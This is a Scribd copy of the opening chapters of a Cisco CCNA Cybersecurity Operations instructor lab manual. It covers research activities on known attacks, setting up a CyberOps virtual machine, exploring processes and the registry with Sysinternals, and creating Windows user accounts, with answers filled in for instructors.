75% found this document useful (12 votes)

7K views

CyberOps v1.1 Instructor Lab Manual PDF

Uploaded by

Marcelo Alejandro Ramírez González

Available Formats

Download as PDF, TXT or read online on Scribd

75% found this document useful (12 votes)

7K views

CyberOps v1.1 Instructor Lab Manual PDF

Uploaded by

Marcelo Alejandro Ramírez González

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 359

CCNA Cybersecurity Operations:

CCNA Cybersecurity Operations 1.1

Instructor Lab Manual

This document is exclusive property of Cisco Systems, Inc. Permission is granted

to print and copy this document for non-commercial distribution and exclusive
use by instructors in the CCNA Cybersecurity Operations course as part of an
official Cisco Networking Academy Program.
Class Activity – Top Hacker Shows Us How It is Done (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Understand vulnerabilities of wireless and other common technologies

Background / Scenario
Nearly every “secure” system that is used today can be vulnerable to some type of cyberattack.

Required Resources
 PC or mobile device with Internet access

Step 1: View the TEDx Video “Top Hacker Shows Us How It’s Done; Pablos Holman at
TEDxMidwests”
a. Click on the link below and watch the Video.
Top Hacker Shows Us How It’s Done; Pablos Holman at TEDxMidwests
In the video, Mr. Holman discusses various security vulnerabilities concerning systems that are typically
considered as secure, however, as he points out in his presentation, they are all vulnerable to attack.
b. Choose one of the hacks discussed by Mr. Holman in the video, and using your favorite search engine
conduct some additional research on the hack.
c. For the hack chosen in Step 1b, answer the questions below. Be prepared to share your work in a full
class discussion.

Step 2: Answer the following questions.

a. What is the vulnerability being exploited?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the hack chosen.
b. What information or data can be gained by a hacker exploiting this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the hack chosen.
c. How is the hack performed?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the hack chosen.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 2 www.netacad.com
Class Activity – Top Hacker Shows Us How It is Done

d. What about this particular hack interested you specifically?

____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the hack chosen.
e. How do you think this particular hack could be mitigated?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the hack chosen.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 2 www.netacad.com
Lab – Installing the CyberOps Workstation Virtual Machine
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Prepare a Personal Computer for Virtualization
Part 2: Import a Virtual Machine into VirtualBox Inventory

Background / Scenario
Computing power and resources have increased tremendously over the last 10 years. A benefit of having
multicore processors and large amounts of RAM is the ability to use virtualization. With virtualization, one or
more virtual computers operate inside one physical computer. Virtual computers that run within physical
computers are called virtual machines. Virtual machines are often called guests, and physical computers are
often called hosts. Anyone with a modern computer and operating system can run virtual machines.
A virtual machine image file has been created for you to install on your computer. In this lab, you will
download and import this image file using a desktop virtualization application, such as VirtualBox.

Required Resources
 Computer with a minimum of 2 GB of RAM and 8 GB of free disk space
 High speed Internet access to download Oracle VirtualBox and the virtual machine image file

Part 1: Prepare a Host Computer for Virtualization

In Part 1, you will download and install desktop virtualization software, and also download an image file that
can be used to complete labs throughout the course. For this lab, the virtual machine is running Linux.

Step 1: Download and install VirtualBox.

VMware Player and Oracle VirtualBox are two virtualization programs that you can download and install to
support the image file. In this lab, you will use VirtualBox.
a. Navigate to http://www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html.
b. Choose and download the appropriate installation file for your operating system.
c. When you have downloaded the VirtualBox installation file, run the installer and accept the default
installation settings.

Step 2: Download the Virtual Machine image file.

The image file was created in accordance with the Open Virtualization Format (OVF). OVF is an open
standard for packaging and distributing virtual appliances. An OVF package has several files placed into one
directory. This directory is then distributed as an OVA package. This package contains all of the OVF files
necessary for the deployment of the virtual machine. The virtual machine used in this lab was exported in
accordance with the OVF standard.
Click here to download the virtual machine image file.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 4 www.netacad.com
Lab - Installing the CyberOps Workstation Virtual Machine

Part 2: Import the Virtual Machine into the VirtualBox Inventory

In Part 2, you will import the virtual machine image into VirtualBox and start the virtual machine.

Step 1: Import the virtual machine file into VirtualBox.

a. Open VirtualBox. Click File > Import Appliance... to import the virtual machine image.
b. A new window will appear. Specify the location of the .OVA file and click Next.
c. A new window will appear presenting the settings suggested in the OVA archive. Check the "Reinitialize
the MAC address of all network cards" box at bottom of the window. Leave all other settings as default.
Click Import.
d. When the import process is complete, you will see the new Virtual Machine added to the VirtualBox
inventory in the left panel. The virtual machine is now ready to use.

Step 2: Start the virtual machine and log in.

a. Select the CyberOps Workstation virtual machine.
b. Click the green arrow Start button at the top portion of the VirtualBox application window. If you get the
following dialog box, click Change Network Settings and set your Bridged Adapter. Click the dropdown
list next the Name and choose your network adapter (will vary for each computer).

Note: If your network is not configured with DHCP services, click Change Network Settings and select
NAT in the Attached to dropdown box. The network settings can also be access via Settings in the

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 4 www.netacad.com
Lab - Installing the CyberOps Workstation Virtual Machine

Oracle VirtualBox Manager or in the virtual machine menu, select Devices > Network > Network
Settings. You may need to disable and enable the network adaptor for the change to take effect.
c. Click OK. A new window will appear, and the virtual machine boot process will start.
d. When the boot process is complete, the virtual machine will ask for a username and password. Use the
following credentials to log into the virtual machine:
Username: analyst
Password: cyberops
You will be presented with a desktop environment: there is a launcher bar at the bottom, icons on the
desktop, and an application menu at the top.
Note: The window running the virtual machine is a completely different computer than your host. Functions,
such as copy and paste, will not work between the two without special software tools installed. Notice the
keyboard and mouse focus. When you click inside the virtual machine window, your mouse and keyboard will
operate the guest operating system. Your host operating system will no longer detect keystrokes or mouse
movements. Press the right CTRL key to return keyboard and mouse focus to the host operating system.

Step 3: Familiarize yourself with the Virtual Machine.

The virtual machine you just installed can be used to complete many of the labs in this course. Familiarize
yourself with the icons in the list below:
The launcher bar icons are (from left to right):
 Show the desktop
 Terminal application
 File manager application
 Web browser application (Firefox)
 File search tool
 Current user's home directory
All course related applications are located under Applications Menu > CyberOPs.
a. List the applications in the CyberOPs menu.
____________________________________________________________________________________
IDLE, SciTE, and Wireshark
b. Open the Terminal Emulator application. Type ip address at the prompt to determine the IP address of
your virtual machine.
What are the IP addresses assigned to your virtual machine?
____________________________________________________________________________________
Answer will vary. The loopback interface is assigned 127.0.0.1/8, and the Ethernet interface is assigned
an IP address in the 10.0.2.0/24 network.
c. Locate and launch the web browser application. Can you navigate to your favorite search engine?
_____________________________________ Yes

Step 4: Shut down the VMs.

When you are done with the VM, you can save the state of VM for future use or shut down the VM.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 4 www.netacad.com
Lab - Installing the CyberOps Workstation Virtual Machine

Closing the VM using GUI:

From the Virtual Box File menu, choose Close...
Click the Save the machine state radio button and click OK. The next time you start the virtual machine,
you will be able to resume working in the operating system in its current state.

The other two options are:

Send the shutdown signal: simulates pressing the power button on a physical computer
Power off the machine: simulates pulling the plug on a physical computer
Closing the VM using CLI:
To shut down the VM using the command line, you can use the menu options inside the VM or enter
sudo shutdown -h now command in a terminal window and provide the password cyberops when
prompted.
Rebooting the VM:
If you want to reboot the VM, you can use the menu options inside the VM or enter sudo reboot
command in a terminal and provide the password cyberops when prompted.
Note: You can use the web browser in this virtual machine to research security issues. By using the virtual
machine, you may prevent malware from being installed on your computer.

Reflection
What are the advantages and disadvantages of using a virtual machine?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
With a virtual machine, you are able to test new applications or operating systems without affecting your host
machine. You are also able to save the current machine state when you close virtual machine. If you have
any issues, you have the option to revert the virtual machine to a previously saved state. On the other hand, a
virtual machine requires hardware resources from the host machine, such as hard drive space, RAM, and
processing power.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 4 www.netacad.com
Lab - Cybersecurity Case Studies (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Research and analyze cyber security incidents

Background / Scenario
Governments, businesses, and individual users are increasingly the targets of cyberattacks and experts
predict that these attacks are likely to increase in the future. Cybersecurity education is a top international
priority as high-profile cyber-security related incidents raise the fear that attacks could threaten the global
economy. The Center for Strategic and International Studies estimates that the cost of cybercrime to the
global economy is more than $400 billion annually and in the United State alone as many as 3000 companies
had their systems compromised in 2013. In this lab you will study four high profile cyberattacks and be
prepared to discuss the who, what, why and how of each attack.

Required Resources
 PC or mobile device with Internet access

Step 1: Conduct search of high profile cyberattacks.

a. Using your favorite search engine conduct a search for each of the cyberattacks listed below. Your
search will likely turn up multiple results ranging from news articles to technical articles.
Home Depot Security Breach
Target Credit Card Breach
The Stuxnet Virus
Sony Pictures Entertainment Hack
Note: You can use the web browser in virtual machine installed in a previous lab to research the hack. By
using the virtual machine, you may prevent malware from being installed on your computer.
b. Read the articles found from your search in step 1a and be prepared to discuss and share your research
on the who, what, when, where, and why of each attack.

Step 2: Write an analysis of a cyberattack.

Select one of the high-profile cyberattacks from step 1a and write an analysis of the attack that includes
answers to the questions below.
a. Who were the victims of the attacks?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the cyberattack chosen.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 2 www.netacad.com
Lab – Cybersecurity Case Studies

b. What technologies and tools were used in the attack?

____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary based on the cyberattack chosen.
c. When did the attack happen within the network?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary based on the cyberattack chosen.
d. What systems were targeted?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary based on the cyberattack chosen.
e. What was the motivation of the attackers in this case? What did they hope to achieve?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary based on the cyberattack chosen.
f. What was the outcome of the attack? (stolen data, ransom, system damage, etc.)
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary based on the cyberattack chosen.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 2 www.netacad.com
Lab – Learning the Details of Attacks (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Research and analyze IoT application vulnerabilities

Background / Scenario
The Internet of Things (IoT) consists of digitally connected devices that are connecting every aspect of our
lives, including our homes, offices, cars, and even our bodies to the Internet. With the accelerating adoption of
IPv6 and the near universal deployment of Wi-Fi networks, the IoT is growing at an exponential pace. Industry
experts estimate that by 2020, the number of active IoT devices will approach 50 billion. IoT devices are
particularly vulnerable to security threats because security has not always been considered in IoT product
design. Also, IoT devices are often sold with old and unpatched embedded operating systems and software.

Required Resources
 PC or mobile device with Internet access

Conduct a Search of IoT Application Vulnerabilities

Using your favorite search engine, conduct a search for Internet of Things (IoT) vulnerabilities. During your
search, find an example of an IoT vulnerability for each of the IoT verticals: industry, energy systems,
healthcare, and government. Be prepared to discuss who might exploit the vulnerability and why, what
caused the vulnerability, and what could be done to limit the vulnerability? Some suggested resources to get
started on your search are listed below:
Cisco IoT Resources
IoT Security Foundation
Business Insider IoT security threats
Note: You can use the web browser in the virtual machine installed in a previous lab to research security
issues. By using the virtual machine, you may prevent malware from being installed on your computer.
From your research, choose an IoT vulnerability and answer the following questions:
a. What is the vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the vulnerability chosen.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 2 www.netacad.com
Lab – Learning the Details of Attacks

b. Who might exploit it? Explain.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 2 www.netacad.com
Lab – Visualizing the Black Hats (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Research and analyze cyber security incidents

Background / Scenario
In 2016, it was estimated that businesses lost $400 million dollars annually to cyber criminals. Governments,
businesses, and individual users are increasingly the targets of cyberattacks and cybersecurity incidents are
becoming more common.
In this lab, you will create three hypothetical cyber attackers, each with an organization, an attack, and a
method for an organization to prevent or mitigate the attack.
Note: You can use the web browser in virtual machine installed in a previous lab to research security issues.
By using the virtual machine, you may prevent malware from being installed on your computer.

Required Resources
 PC or mobile device with Internet access

Scenario 1:
a. Who is the attacker?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
b. What organization/group is the attacker associated with?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
c. What is the motive of the attacker?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
d. What method of attack was used?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 3 www.netacad.com
Lab – Visualizing the Black Hats

Answers will vary.

e. What was the target and vulnerability used against the business?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
f. How could this attack be prevented or mitigated?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.

Scenario 2:
a. Who is the attacker?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
b. What organization/group is the attacker associated with?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
c. What is the motive of the attacker?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
d. What method of attack was used?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
e. What was the target and vulnerability used against the business?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 3 www.netacad.com
Lab – Visualizing the Black Hats

f. How could this attack be prevented or mitigated?

Scenario 3:
a. Who is the attacker?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
b. What organization/group is the attacker associated with?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
c. What is the motive of the attacker?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
d. What method of attack was used?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
e. What was the target and vulnerability used against the business?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
f. How could this attack be prevented or mitigated?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 3 www.netacad.com
Lab - Becoming a Defender (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Research and analyze what it takes to become a network defender

Background / Scenario
In our technology-centric world, as the world gets more connected, it also gets less safe. Cybersecurity is one
of the fastest growing and in-demand professions. Individuals in this field perform a wide variety of jobs
including but not limited to consultation, investigation and program management services to mitigate risks
through both internal and external sources. Cybersecurity professionals are required to evaluate, design and
implement security plans, conduct in-depth fraud investigation and perform security research and risk
assessment and propose solutions to potential security breaches.
Individuals with good security skills have a great earning potential. To be considered for one of these high
paying jobs, it is imperative to have the proper qualifications. To this effect, it is important to consider the
industry certificates available for this career path. There are many certifications to choose from, and selecting
the right certificate(s) for you individually requires careful consideration.
Note: You can use the web browser in virtual machine installed in a previous lab to research security related
issues. By using the virtual machine, you may prevent malware from being installed on your computer.

Required Resources
 PC or mobile device with Internet access

Step 1: Conduct search of Certifications.

a. Using your favorite search engine conduct a search for the most popular certifications are (in terms of
what people hold, not necessarily what employers demand):
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
b. Pick three certifications from the list above and provide more detail below about the certification
requirements / knowledge gained ie: vendor specific or neutral, number of exams to gain certification,
exam requirements, topics covered etc.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.

Step 2: Investigate positions available within cybersecurity

Indeed.com is one of the largest job site worldwide. Using your browser of choice, access indeed.com and
search for cybersecurity jobs available within the last two weeks.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 2 www.netacad.com
Lab - Becoming a Defender

a. How many new job listings were posted within the last two weeks?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.
b. What is the salary range for the top 10 listings?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary.
c. What are the most common qualifications required by employers?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary.
d. What industry certifications are required by these employers?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary.
e. Do any of certifications match the ones listed in Step 1a?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The answers will vary.
f. Investigate online resources that allow you to legally test your hacking skills. These tools allow a novice
with limited cyber security experience to sharpen their penetration testing skills, such as Google Gruyere
(Web Application Exploits and Defenses).
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 2 www.netacad.com
Class Activity – Identify Running Processes (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will use TCP/UDP Endpoint Viewer, a tool in Sysinternals Suite, to identify any running
processes on your computer.

Background / Scenario
In this lab, you will explore processes. Processes are programs or applications in execution. You will explore
the processes using Process Explorer in the Windows Sysinternals Suite. You will also start and observe a
new process.

Required Resources
 1 Windows PC with Internet access

Step 1: Download Windows Sysinternals Suite.

a. Navigate to the following link to download Windows Sysinternals Suite:
https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
b. After the download is completed, right+click the zip file, and choose Extract All…, to extract the files from
the folder. Choose the default name and destination in the Downloads folder and click Extract.
c. Exit the web browser.

Step 2: Start TCP/UDP Endpoint Viewer.

a. Navigate to the SysinternalsSuite folder with all the extracted files.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 3 www.netacad.com
Class Activity – Identify Running Processes

b. Open Tcpview.exe. Accept the Process Explorer License Agreement when prompted. Click Yes to allow
this app to make changes to your device.

c. Exit the File Explorer and close all the currently running applications.

Step 3: Explore the running processes.

a. TCPView lists the process that are currently on your Windows PC. At this time, only Windows processes
are running.

b. Double-click lsass.exe.
What is lsass.exe? In what folder is it located?
____________________________________________________________________________________
____________________________________________________________________________________
Local Security Authority Process is the name for lsass.exe. It is located in C:\Windows\System32\ folder.
c. Close the properties window for lsass.exe when done.
d. View the properties for the other running processes.
Note: Not all processes can be queried for properties information.

Step 4: Explore a user-started process.

a. Open a web browser, such as Microsoft Edge.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 3 www.netacad.com
Class Activity – Identify Running Processes

What did you observe in the TCPView window?

____________________________________________________________________________________
The processes for the web browser are added to the TCPView window.

b. Close the web browser.

What did you observe in the TCPView window?
____________________________________________________________________________________
The processes for the web browser will be removed from the TCPView window.

c. Reopen the web browser. Research some of the processes listed in TCPView. Record your findings.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary. The process lsass.exe verifies the validity of user logins to the PC. The services.exe is
used to start and stop services and change the default services startup settings. The process svnhost.exe
(Service Host) handles the process of sharing system resources. Most of these listed resources are
located in the C:\Windows\System32\ folder. If these executables are found elsewhere in the system, they
maybe malware, such as viruses, spyware, trojans or worms.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 3 www.netacad.com
Lab – Exploring Processes, Threads, Handles, and Windows
Registry (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
In this lab, you will explore the processes, threads, and handles using Process Explorer in the SysInternals
Suite. You will also use the Windows Registry to change a setting.
Part 1: Exploring Processes
Part 2: Exploring Threads and Handles
Part 3: Exploring Windows Registry

Required Resources
 1 Windows PC with Internet access

Part 1: Exploring Processes

In this part, you will explore processes. Processes are programs or applications in execution. You will explore
the processes using Process Explorer in the Windows SysInternals Suite. You will also start and observe a
new process.

Step 1: Download Windows SysInternals Suite.

a. Navigate to the following link to download Windows SysInternals Suite:
https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
b. After the download is completed, extract the files from the folder.
c. Leave the web browser open for the following steps.

Step 2: Explore an active process.

a. Navigate to the SysinternalsSuite folder with all the extracted files.
b. Open procexp.exe. Accept the Process Explorer License Agreement when prompted.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 8 www.netacad.com
Lab – Exploring Processes, Threads, Handles, and Windows Registry

c. The Process Explorer displays a list of currently active processes.

d. To locate the web browser process, drag the Find Window's Process icon ( ) into the opened web
browser window. Microsoft Edge was used in this example.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 8 www.netacad.com
Lab – Exploring Processes, Threads, Handles, and Windows Registry

e. The Microsoft Edge process can be terminated in the Process Explorer. Right-click the selected process
and select Kill Process.

What happened to the web browser window when the process is killed?
____________________________________________________________________________________
The web browser window closes.

Step 3: Start another process.

a. Open a Command Prompt. (Start > search Command Prompt > select Command Prompt)

b. Drag the Find Window's Process icon ( ) into the Command Prompt window and locate the highlighted
Command Prompt process in Process Explorer.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 8 www.netacad.com
Lab – Exploring Processes, Threads, Handles, and Windows Registry

c. The process for the Command Prompt is cmd.exe. Its parent process is explorer.exe process. The
cmd.exe has a child process, conhost.exe.

d. Navigate to the Command Prompt window. Start a ping at the prompt and observe the changes under the
cmd.exe process.
What happened during the ping process?
____________________________________________________________________________________
A child process PING.EXE listed under the cmd.exe during the ping process.
e. As you review the list of active processes, you find that the child process conhost.exe may be suspicious.
To check for malicious content, right-click conhost.exe and select Check VirusTotal. When prompted,
click Yes to agree to VirusTotal Terms of Service. Then click OK for the next prompt.

f. Expand the Process Explorer window or scroll to the right until you see the VirusTotal column. Click the
link under the VirusTotal column. The default web browser opens with the results regarding the malicious
content of conhost.exe.
g. Right-click the cmd.exe process and select Kill Process. What happened to the child process
conhost.exe?
____________________________________________________________________________________

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 8 www.netacad.com
Lab – Exploring Processes, Threads, Handles, and Windows Registry

The child process depends on the parent process. So when the parent process stops, the child process
also stops.

Part 2: Exploring Threads and Handles

In this part, you will explore threads and handles. Processes have one or more threads. A thread is a unit of
execution in a process. A handle is an abstract reference to memory blocks or objects managed by an
operating system. You will use Process Explorer (procexp.exe) in Windows SysInternals Suite to explore the
threads and handles.

Step 1: Explore threads.

a. Open a command prompt.
b. In Process Explorer window, right-click conhost.exe and Select Properties….. Click the Threads tab to
view the active threads for the conhost.exe process.

c. Examine the details of the thread. What type of information is available in the Properties window?
____________________________________________________________________________________
____________________________________________________________________________________
Information available includes environment variable, security information, performance information, and
printable strings.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 8 www.netacad.com
Lab – Exploring Processes, Threads, Handles, and Windows Registry

Step 2: Explore handles.

In the Process Explorer, click View > select Show Lower Pane > Handles to view the handles associated
with the conhost.exe process.

Examine the handles. What are the handles pointing to?

_______________________________________________________________________________________
The handles are pointing to files, registry keys, and threads.

Part 3: Exploring Windows Registry

The Windows Registry is a hierarchical database that stores most of the operating systems and desktop
environment configuration settings. In this part, you will
a. To access the Windows Registry, click Start > Search for regedit and select Registry Editor. Click Yes
when asked to allow this app to make changes.
The Registry Editor has five hives. These hives are at the top level of the registry.
o HKEY_CLASSES_ROOT is actually the Classes subkey of HKEY_LOCAL_MACHINE\Software\. It
stores information used by registered applications like file extension association, as well as a
programmatic identifier (ProgID), Class ID (CLSID), and Interface ID (IID) data.
o HKEY_CURRENT_USER contains the settings and configurations for the users who are currently
logged in.
o HKEY_LOCAL_MACHINE stores configuration information specific to the local computer.
o HKEY_USERS contains the settings and configurations for all the users on the local computer.
HKEY_CURRENT_USER is a subkey of HKEY_USERS.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 8 www.netacad.com
Lab – Exploring Processes, Threads, Handles, and Windows Registry

o HKEY_CURRENT_CONFIG stores the hardware information that is used at bootup by the local
computer.

b. In a previous step, you had accepted the EULA for Process Explorer. Navigate to the EulaAccepted
registry key for Process Explorer.
Click to select Process Explorer in HKEY_CURRENT_USER > Software > Sysinternals > Process
Explorer. Scroll down to locate the key EulaAccepted. Currently, the value for the registry key
EulaAccepted is 0x00000001(1).

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 8 www.netacad.com
Lab – Exploring Processes, Threads, Handles, and Windows Registry

c. Double-click EulaAccepted registry key. Currently the value data is set to 1. The value of 1 indicates that
the EULA has been accepted by the user.

d. Change the 1 to 0 for Value data. The value of 0 indicates that the EULA was not accepted. Click OK to
continue.
What is value for this registry key in the Data column?
____________________________________________________________________________________
0x00000000(0)
e. Open the Process Explorer. Navigate to the folder where you have downloaded SysInternals. Open the
folder SysInternalsSuite > Open procexp.exe.
When you open the Process Explorer, what did you see?
____________________________________________________________________________________
The Process Explorer License Agreement dialog box

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 8 www.netacad.com
Lab - Create User Accounts (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Introduction
In this lab, you will create and modify user accounts in Windows.
Part 1: Creating a New Local User Account
Part 2: Reviewing User Account Properties
Part 3: Modifying Local User Accounts

Required Resources
 A Windows PC
Instructor Note: Provide students with a user account name and password to be created in this lab.

Part 1: Creating a New Local User Account

Step 1: Open the User Account Tool.
a. Log on to the computer with an Administrator account. The account CyberOpsUser is used in this
example.
b. Click Start > search Control Panel. Select User Accounts in the Small icons view. To change the view,
select Small icons in the View by drop down list.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 10 www.netacad.com
Lab - Create User Accounts

Step 2: Create a user account.

a. The User Accounts window opens. Click Manage another account.

b. The Manage Accounts window opens. Click Add a new user in PC settings.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 10 www.netacad.com
Lab - Create User Accounts

c. The Settings window opens. Click Add someone else to this PC.

d. The How will this person sign in? window opens. Click I don't have this person's sign-in
information.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 10 www.netacad.com
Lab - Create User Accounts

e. The Let's create your account window opens. Click Add a user without a Microsoft account.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 10 www.netacad.com
Lab - Create User Accounts

f. The Create an account for this PC window opens. Provide the necessary information to create the new
user account named User1. Click Next to create the new user account.

g. What type of user account did you just create?

____________________________________________________________________________________
A local account with no administrative rights
h. Log into the newly created user account. It should be successful.
i. Navigate to C:\Users folder. Right-click the User1 folder and select Properties, and then the Security
tab. Which groups or users have full control of this folder?
____________________________________________________________________________________
Groups: SYSTEM, Administrators Users: User1
j. Open the folder that belongs to CyberOpsUser. Right-click the folder and click the Properties tab. Were
you able to access the folder? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
You do not have permission to access this folder.
k. Log out of User1 account. Log back in as CyberOpsUser.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 10 www.netacad.com
Lab - Create User Accounts

l. Navigate to C:\Users folder. Right-click the folder and select Properties. Click the Security tab. Which
groups or users have full control of this folder?
____________________________________________________________________________________
Groups: SYSTEM, Administrators Users: CyberOpsUser

Part 2: Reviewing User Account Properties

a. Click Start > Search for Control Panel > Select Administrative Tools > Select Computer
Management.
b. Select Local Users and Groups. Click the Users folder.

c. Right-click User1 and select Properties.

d. Click the Member Of tab.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 10 www.netacad.com
Lab - Create User Accounts

Which group is User1 is a member of? ________________________________ Users

e. Right-click the account CyberOpsUser and select Properties.
Which group is this user a member of? ________________________________ Users and Administrators

Part 3: Modifying Local User Accounts

Step 1: Change the account type.
a. Navigate to the Control Panel and select User Accounts. Click Manage another account. Select
User1.

b. In the Change an Account window, click the User1 account. Click Change the account type.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 10 www.netacad.com
Lab - Create User Accounts

c. Select the Administrator radio button. Click Change Account Type.

d. Now the account User1 has administrative rights.

e. Navigate to Control Panel > Administrative Tools > Computer Management. Click Local Users and
Groups> Users.
f. Right-click User1 and select Properties. Click Member Of tab.
Which groups does User1 belong to?
____________________________________________________________________________________
Administrators and Users

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 10 www.netacad.com
Lab - Create User Accounts

g. Select Administrators and click Remove to remove User1 from the Administrative group. Click OK to
continue.

Step 2: Delete the account.

a. To delete the account, right-click User1and select Delete.

b. Click OK to confirm the deletion. What is another way to delete a user account?
____________________________________________________________________________________
Control Panel > User Accounts > Manage another account > Select User1 > Delete the account

Reflection
1. Why is it important to protect all accounts with strong passwords?
_______________________________________________________________________________________
_______________________________________________________________________________________

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 10 www.netacad.com
Lab - Create User Accounts

No password or a weak password can allow access from almost anyone to steal data, or use the computer for
unauthorized purposes.
2. Why would you create a user with Standard privileges?
